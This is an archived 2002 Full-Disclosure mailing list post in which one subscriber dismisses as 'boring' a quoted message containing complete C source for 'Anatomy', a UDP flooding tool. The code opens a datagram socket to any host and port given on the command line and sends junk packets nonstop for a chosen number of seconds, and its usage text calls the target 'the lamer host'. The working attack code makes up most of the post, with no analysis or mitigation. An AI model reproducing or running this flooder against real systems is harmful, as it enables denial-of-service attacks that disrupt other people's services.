lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20020827021108.GF417@bokeoa.com> From: core at bokeoa.com (Charles Stevenson) Subject: 411 [ sneak previews ] - #1 Boring... peace, core On Tue, Aug 27, 2002 at 01:37:37AM +0000, Slack wh0re wrote: > /* > * Anatomy.c > * I have no idea how this could be a threat > * if it would be kept private. > * > * Published by: slackwh0re > <slackwh0re@...k-el8-and-fuck-phrack_at_efnet.com> > * Author: unknown <unknown@...nown.unk> > * > * k1dd13 us4g3: ./anatomy > * 3ls3: `vi anatomy.c` > * > * --slackwh0re > * > * Full-Disclosure, Fresh and shiny. > * Full-Disclosure, Unreal hacking. > * Full-Disclosure, Cos that's the real elite shit. > * Full-Disclosure, Ken Levine does it. > * Full-Disclosure, - since 1901. > * Full-Disclosure, ~/Full-Disclosure directory. > * Full-Disclosure, Erected because of it. > * Full-Disclosure, Lame el8 blames > * Full-Disclosure,l8er. > * > * He said: "Don't wonder why there is no comments." > */ > > #define BOMB_STRING "0123456789ABCDE" > #define BOMB_SIZE 15 > > #include <stdio.h> > #include <sys/param.h> > #include <sys/socket.h> > #include <sys/time.h> > #include <time.h> > #include <netinet/in.h> > #include <netdb.h> > #include <stdarg.h> > > int echo_connect(char *, short); > > int echo_connect(char *server, short port) > { > struct sockaddr_in sin; > struct hostent *hp; > int thesock; > > printf("\n"); > printf("Stealth> %s : port %d\n", server, port); > hp = gethostbyname(server); > if (hp==NULL) { > printf("Stealth> Non-existant host: %s\n",server); > printf("\n"); > exit(0); > } > bzero((char*) &sin, sizeof(sin)); > bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); > sin.sin_family = hp->h_addrtype; > sin.sin_port = htons(port); > thesock = socket(AF_INET, SOCK_DGRAM, 0); > connect(thesock,(struct sockaddr *) &sin, sizeof(sin)); > return thesock; > } > main(int argc, char **argv) > { > time_t start=time(NULL); > int s; > int secs; > if(argc != 4) > { > > printf("\n"); > printf("Anatomy Stealth By T10o Modified By The DvS. U dun PheeR?!\n"); > printf("\n"); > printf("Usage: st-kill <the lamer host> <fucking port> <secs>\n"); > printf("\n"); > exit(0); > } > s=echo_connect(argv[1], atoi(argv[2])); > secs= atoi(argv[3]); > for(;;) > { > while(time(NULL) <= start+secs) > {send(s, BOMB_STRING, BOMB_SIZE, 0);} > exit(0); > } > } > > /* From the big generousity of el8 and phrack @ efnet. */ > /* l4m3rz!! h4h4!!! */ > > > > > > _________________________________________________________________ > Chat with friends online, try MSN Messenger: http://messenger.msn.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > -- Charles Stevenson (core) <core@...eoa.com> Lab Assistant, College of Eastern Utah San Juan Campus http://www.bokeoa.com/~core/core.asc -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020826/889be05a/attachment.bin
Powered by blists - more mailing lists